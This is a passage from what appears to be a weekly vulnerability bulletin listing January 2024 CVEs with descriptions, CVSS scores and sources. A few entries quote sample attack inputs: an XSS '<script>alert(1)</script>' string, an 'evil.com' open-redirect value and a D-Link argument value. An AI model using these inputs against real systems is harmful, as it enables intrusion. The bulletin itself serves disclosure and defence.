traccar -- traccarTraccar is an open source GPS tracking system. Prior to 5.11, Traccar is affected by an unrestricted file upload vulnerability in File feature allows attackers to execute arbitrary code on the server. This vulnerability is more prevalent because Traccar is recommended to run web servers as root user. It is also more dangerous because it can write or overwrite files in arbitrary locations. Version 5.11 was published to fix this vulnerability.2024-01-159.8CVE-2023-50729
security-advisories@github.com
tribe29 -- checkmkPrivilege escalation in mk_tsm agent plugin in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows local user to escalate privileges2024-01-127.8CVE-2023-6735
security@checkmk.com
tribe29 -- checkmkPrivilege escalation in jar_signature agent plugin in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows local user to escalate privileges2024-01-127.8CVE-2023-6740
security@checkmk.com
troglobit -- libeuvuev (aka libuev) before 2.4.1 has a buffer overflow in epoll_wait if maxevents is a large number.2024-01-129.8CVE-2022-48620
cve@mitre.org
cve@mitre.org
cve@mitre.org
verydows -- verydowsVerydows v2.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /protected/controller/backend/role_controller2024-01-128.8CVE-2023-51949
cve@mitre.org
vinoj_cardoza -- 3d_tag_cloudCross-Site Request Forgery (CSRF) vulnerability in Vinoj Cardoza 3D Tag Cloud allows Stored XSS.This issue affects 3D Tag Cloud: from n/a through 3.8.2024-01-177.1CVE-2022-41990
audit@patchstack.com
vitejs -- viteVite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers.2024-01-197.5CVE-2024-23331
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
vmware -- aria_automation/cloud_foundation
 
Aria Automation contains a Missing Access Control vulnerability. An authenticated malicious actor may exploit this vulnerability leading to unauthorized access to remote organizations and workflows.2024-01-169.9CVE-2023-34063
security@vmware.com
vyperlang -- vyperVyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data as we require it to be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in commit `55e18f6d1` which will be included in future releases. Users are advised to update when possible.2024-01-187.3CVE-2024-22419
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
warfareplugins -- social_sharing_plugin_'swp_url'_social_warfareThe Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server.2024-01-1710CVE-2021-4434
security@wordfence.com
security@wordfence.com
wazuh -- wazuhWazuh is a free and open source platform used for threat prevention, detection, and response. This bug introduced a stack overflow hazard that could allow a local privilege escalation. This vulnerability was patched in version 4.5.3.2024-01-127.4CVE-2023-42463
security-advisories@github.com
webtoffee -- stripe_payment_plugin_for_woocommerceThe Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.2024-01-199.8CVE-2024-0705
security@wordfence.com
security@wordfence.com
wpdeveloper -- essential_blocksThe Essential Blocks WordPress plugin before 4.4.3 does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.2024-01-159.8CVE-2023-6623
contact@wpscan.com
contact@wpscan.com
wpexperts -- post_smtp_mailerThe POST SMTP Mailer WordPress plugin before 2.8.7 does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin.2024-01-157.2CVE-2023-6620
contact@wpscan.com
wpfastestcache -- wp_fastest_cacheThe WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber2024-01-168.8CVE-2021-24869
contact@wpscan.com
contact@wpscan.com
wpforms -- wpforms_proThe WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2024-01-207.2CVE-2023-7063
security@wordfence.com
security@wordfence.com
xorg -- xorg-serverA flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context.2024-01-187.8CVE-2024-0409
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
xorg-server -- xorg-serverA flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.2024-01-187.8CVE-2023-6816
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
yugeshverma -- online_lawyer_management_systemA vulnerability was found in Project Worlds Lawyer Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file searchLawyer.php. The manipulation of the argument experience leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250603.2024-01-139.8CVE-2024-0498
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
yunyou -- cmsA vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability.2024-01-177.3CVE-2024-0648
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zhicms -- zhicmsA vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839.2024-01-167.3CVE-2024-0603
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com

Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
ELAN -- match-on-Chip_FPRELAN Match-on-Chip FPR solution has design fault about potential risk of valid SID leakage and enumeration with spoof sensor. This fault leads to that Windows Hello recognition would be bypass with cloning SID to cause broken account identity. Version which is lower than 3.0.12011.08009(Legacy)/3.3.12011.08103(ESS) would suffer this risk on DELL Inspiron platform.2024-01-126CVE-2024-0454
36106deb-8e95-420b-a0a0-e70af5d245df
ability -- ability_ftp_serverA vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability.2024-01-155.3CVE-2024-0547
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
acritum_femitter -- acritum_femitter_server
 
A vulnerability, which was classified as problematic, was found in Acritum Femitter Server 1.04. Affected is an unknown function. The manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250446 is the identifier assigned to this vulnerability.2024-01-124.3CVE-2010-10011
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
adobe -- acrobat_for_edgeAcrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2024-01-155.5CVE-2024-20709
psirt@adobe.com
adobe -- acrobat_for_edgeAcrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.2024-01-155.5CVE-2024-20721
psirt@adobe.com
adobe -- adobe_experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2024-01-185.4CVE-2023-51463
psirt@adobe.com
adobe -- adobe_experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2024-01-185.4CVE-2023-51464
psirt@adobe.com
advanced-woo-search -- advanced_woo_searchThe Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed.2024-01-136.1CVE-2024-0251
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
algolplus -- advanced_dynamic_pricing_for_woocommerceMissing Authorization vulnerability in AlgolPlus Advanced Dynamic Pricing for WooCommerce.This issue affects Advanced Dynamic Pricing for WooCommerce: from n/a through 4.1.5.2024-01-176.3CVE-2022-40203
audit@patchstack.com
allegro -- rompagerA vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure.2024-01-144.3CVE-2024-0522
cna@vuldb.com
cna@vuldb.com
apollo-- apolloA vulnerability was found in Apollo 2.0.0/2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /users of the component Configuration Center. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-250430 is the identifier assigned to this vulnerability. NOTE: The maintainer explains that user data information like user id, name, and email are not sensitive.2024-01-124.3CVE-2022-4962
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
avaya -- experience_portal_managerInsecure Direct Object Reference vulnerabilities were discovered in the Avaya Aura Experience Portal Manager which may allow partial information disclosure to an authenticated non-privileged user. Affected versions include 8.0.x and 8.1.x, prior to 8.1.2 patch 0402. Versions prior to 8.0 are end of manufacturer support.2024-01-175.7CVE-2023-7031
securityalerts@avaya.com
aveva -- pi_serverAVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to cause the PI Message Subsystem of a PI Server to consume available memory resulting in throttled processing of new PI Data Archive events and a partial denial-of-service condition.2024-01-185.3CVE-2023-31274
ics-cert@hq.dhs.gov
avo-hq -- avoAvo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade.2024-01-166.5CVE-2024-22411
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ays-pro -- quiz_makerImproper input validation vulnerability in WordPress Quiz Maker Plugin prior to 6.5.0.6 allows a remote authenticated attacker to perform a Denial of Service (DoS) attack against external services.2024-01-126.5CVE-2024-22027
vultures@jpcert.or.jp
vultures@jpcert.or.jp
brainstorm-- ultimate_addons_for_beaver_builder - liteMissing Authorization vulnerability in Brainstorm Force Ultimate Addons for Beaver Builder - Lite. This issue affects Ultimate Addons for Beaver Builder - Lite: from n/a through 1.5.5.2024-01-174.3CVE-2023-23882
audit@patchstack.com
brechtvds -- wp_recipe_makerThe WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2024-01-186.4CVE-2023-6958
security@wordfence.com
security@wordfence.com
brechtvds -- wp_recipe_makerThe WP Recipe Maker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'Referer' header in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.2024-01-186.1CVE-2023-6970
security@wordfence.com
security@wordfence.com
brechtvds -- wp_recipe_makerThe WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2024-01-186.4CVE-2024-0381
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
carmelogarcia -- employee_profile_management_systemA vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572.2024-01-126.1CVE-2024-0467
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
centralsquare -- click2gov_building_permitAn issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known.2024-01-124.3CVE-2023-40362
cve@mitre.org
cve@mitre.org
cisco -- WAP371_ wireless-AC/N_ dual_radio_ access_point_ (AP)_with_single_ point_setupA vulnerability in the web-based management interface of the Cisco WAP371 Wireless-AC/N Dual Radio Access Point (AP) with Single Point Setup could allow an authenticated, remote attacker to perform command injection attacks against an affected device. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device. To exploit this vulnerability, the attacker must have valid administrative credentials for the device.2024-01-176.5CVE-2024-20287
ykramarz@cisco.com
cisco -- cisco_identity_services_engine_softwareA vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.2024-01-174.8CVE-2024-20251
ykramarz@cisco.com
cisco -- cisco_prime_infrastructureA vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system. This vulnerability is due to improper processing of serialized Java objects by the affected application. An attacker could exploit this vulnerability by uploading a document containing malicious serialized Java objects to be processed by the affected application. A successful exploit could allow the attacker to cause the application to execute arbitrary commands.2024-01-176.5CVE-2023-20258
ykramarz@cisco.com
cisco -- cisco_prime_infrastructureA vulnerability in the application CLI of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager could allow an authenticated, local attacker to gain escalated privileges. This vulnerability is due to improper processing of command line arguments to application scripts. An attacker could exploit this vulnerability by issuing a command on the CLI with malicious options. A successful exploit could allow the attacker to gain the escalated privileges of the root user on the underlying operating system.2024-01-176CVE-2023-20260
ykramarz@cisco.com
cisco -- cisco_prime_infrastructureA vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an authenticated, remote attacker to conduct cross-site scripting attacks. This vulnerability is due to improper validation of user-supplied input to the web-based management interface. An attacker could exploit this vulnerability by submitting malicious input containing script or HTML content within requests that would stored within the application interface. A successful exploit could allow the attacker to conduct cross-site scripting attacks against other users of the affected application.2024-01-174.8CVE-2023-20257
ykramarz@cisco.com
cisco -- cisco_thousandeyes_recorder_applicationA vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root.2024-01-176.8CVE-2024-20277
ykramarz@cisco.com
cisco-- broadworksA vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.2024-01-174.8CVE-2024-20270
ykramarz@cisco.com
cisco-- epnmA vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain and modify sensitive information that is stored in the underlying database.2024-01-176.5CVE-2023-20271
ykramarz@cisco.com
cloud_software_group -- citrix_session_recordingCross SiteScripting vulnerability in Citrix Session Recording allows attacker to perform Cross Site Scripting2024-01-185CVE-2023-6184
secure@citrix.com
cloud_software_group -- citrix_storefront Cross-site scripting (XSS)2024-01-175.4CVE-2023-5914
secure@citrix.com
cloud_software_group -- netscaler_adcImproper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gatewayallows an attacker with access o NSIP, CLIP or SNIP with management interface to perform. Authenticated (low privileged) remote code execution on Management Interface.2024-01-175.5CVE-2023-6548
secure@citrix.com
cms -- cmseasyA vulnerability was found in CmsEasy up to 7.7.7. It has been declared as critical. Affected by this vulnerability is the function getslide_child_action in the library lib/admin/language_admin.php. The manipulation of the argument sid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-146.3CVE-2024-0523
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects -- employee_profile_management_systemA vulnerability classified as problematic was found in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file download.php. The manipulation of the argument download_file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-250570 is the identifier assigned to this vulnerability.2024-01-125.3CVE-2024-0465
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codeastro -- real_estate_management_systemA vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability.2024-01-156.3CVE-2024-0543
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codecanyon -- rise_rise_ultimate_project_managerA vulnerability classified as problematic was found in CodeCanyon RISE Rise Ultimate Project Manager 3.5.3. This vulnerability affects unknown code of the file /index.php/signin. The manipulation of the argument redirect with the input http://evil.com leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250714 is the identifier assigned to this vulnerability.2024-01-155.3CVE-2024-0545
cna@vuldb.com
cna@vuldb.com
codepeople -- wp_time_slots_booking_formMissing Authorization vulnerability in CodePeople WP Time Slots Booking Form. This issue affects WP Time Slots Booking Form: from n/a through 1.1.76.2024-01-174.3CVE-2022-41790
audit@patchstack.com
cozmoslabs -- profile_builderImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs Profile Builder Pro allows Reflected XSS.This issue affects Profile Builder Pro: from n/a through 3.10.0.2024-01-136.1CVE-2024-22142
audit@patchstack.com
d-Link --multiple_productsA vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability.2024-01-195.3CVE-2024-0717
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
davidjmiller -- voting_recordThe Voting Record WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack2024-01-165.4CVE-2023-7083
contact@wpscan.com
contact@wpscan.com
davidjmiller -- voting_recordThe Voting Record WordPress plugin through 2.0 is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks2024-01-165.4CVE-2023-7084
contact@wpscan.com
contact@wpscan.com
dedebiz -- dedebizA vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-154.7CVE-2024-0558
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
deepfacelab -- deepfacelabA vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability.2024-01-185.3CVE-2024-0654
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
discourse -- discourseDiscourse is a platform for community discussion. For fields that are client editable, limits on sizes are not imposed. This allows a malicious actor to cause a Discourse instance to use excessive disk space and also often excessive bandwidth. The issue is patched 3.1.4 and 3.2.0.beta4.2024-01-124.3CVE-2024-21655
security-advisories@github.com
dogukanurker -- flaskblogflaskBlog is a simple blog app built with Flask. Improper storage and rendering of the `/user/<user>` page allows a user's comments to execute arbitrary javascript code. The html template `user.html` contains the following code snippet to render comments made by a user: `<div class="content" tag="content">{{comment[2]|safe}}</div>`. Use of the "safe" tag causes flask to _not_ escape the rendered content. To remediate this, simply remove the `|safe` tag from the HTML above. No fix is is available and users are advised to manually edit their installation.2024-01-176.5CVE-2024-22414
security-advisories@github.com
easy.jobs -- easy.jobsThe easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg WordPress plugin before 2.4.7 does not properly secure some of its AJAX actions, allowing any logged-in users to modify its settings.2024-01-154.3CVE-2023-6843
contact@wpscan.com
easyftp -- easyftpA vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715.2024-01-155.3CVE-2024-0546
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
easyftp-- easyftpA vulnerability, which was classified as critical, was found in EasyFTP 1.7.0.2. Affected is an unknown function of the component MKD Command Handler. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250716.2024-01-166.3CVE-2011-10005
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
efs -- easy_chat_serverA vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-184.3CVE-2024-0695
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
efs -- easy_file_sharing_ftpA vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-185.3CVE-2024-0693
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
efs -- easy_file_sharing_ftpA vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.2024-01-195.3CVE-2024-0736
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
estatik -- estatikThe Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not prevent user with low privileges on the site, like subscribers, from setting any of the site's options to 1, which could be used to break sites and lead to DoS when certain options are reset2024-01-156.5CVE-2023-6048
contact@wpscan.com
estatik -- estatikThe Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin2024-01-156.1CVE-2023-6050
contact@wpscan.com
fabianros -- simple_online_hotel_reservation_systemA vulnerability has been found in code-projects Simple Online Hotel Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file add_reserve.php of the component Make a Reservation Page. The manipulation of the argument Firstname/Lastname with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250618 is the identifier assigned to this vulnerability.2024-01-136.1CVE-2024-0504
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
favorites-web_project -- favorites-webA vulnerability, which was classified as problematic, has been found in cloudfavorites favorites-web 1.3.0. Affected by this issue is some unknown functionality of the component Nickname Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250238 is the identifier assigned to this vulnerability.2024-01-125.4CVE-2022-4960
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fireeye -- central_managementXSS vulnerability in FireEye Central Management affecting version 9.1.1.956704, which could allow an attacker to modify special HTML elements in the application and cause a reflected XSS, leading to a session hijacking.2024-01-156.1CVE-2024-0314
cve-coordination@incibe.es
fireeye -- hxtoolCross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 'Hostname/IP' parameters that will be triggered when items are loaded.2024-01-156.1CVE-2024-0318
cve-coordination@incibe.es
fireeye -- hxtoolOpen Redirect vulnerability in FireEye HXTool affecting version 4.6, the exploitation of which could allow an attacker to redirect a legitimate user to a malicious page by changing the 'redirect_uri' parameter.2024-01-156.1CVE-2024-0319
cve-coordination@incibe.es
fireeye -- malware_analysisCross-Site Scripting in FireEye Malware Analysis (AX) affecting version 9.0.3.936530. This vulnerability allows an attacker to send a specially crafted JavaScript payload in the application URL to retrieve the session details of a legitimate user.2024-01-156.1CVE-2024-0320
cve-coordination@incibe.es
fireeye_ -- fireeye_exCross-Site Scripting in FireEye EX, affecting version 9.0.3.936727. Exploitation of this vulnerability allows an attacker to send a specially crafted JavaScript payload via the 'type' and 's_f_name' parameters to an authenticated user to retrieve their session details.2024-01-155.4CVE-2024-0317
cve-coordination@incibe.es
flycms-- flycmsFlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the system website settings website name section.2024-01-185.4CVE-2024-22548
cve@mitre.org
flycms -- flycmsFlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the email settings of the website settings section.2024-01-185.4CVE-2024-22549
cve@mitre.org
foru -- cmsA vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.2024-01-194.7CVE-2024-0728
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
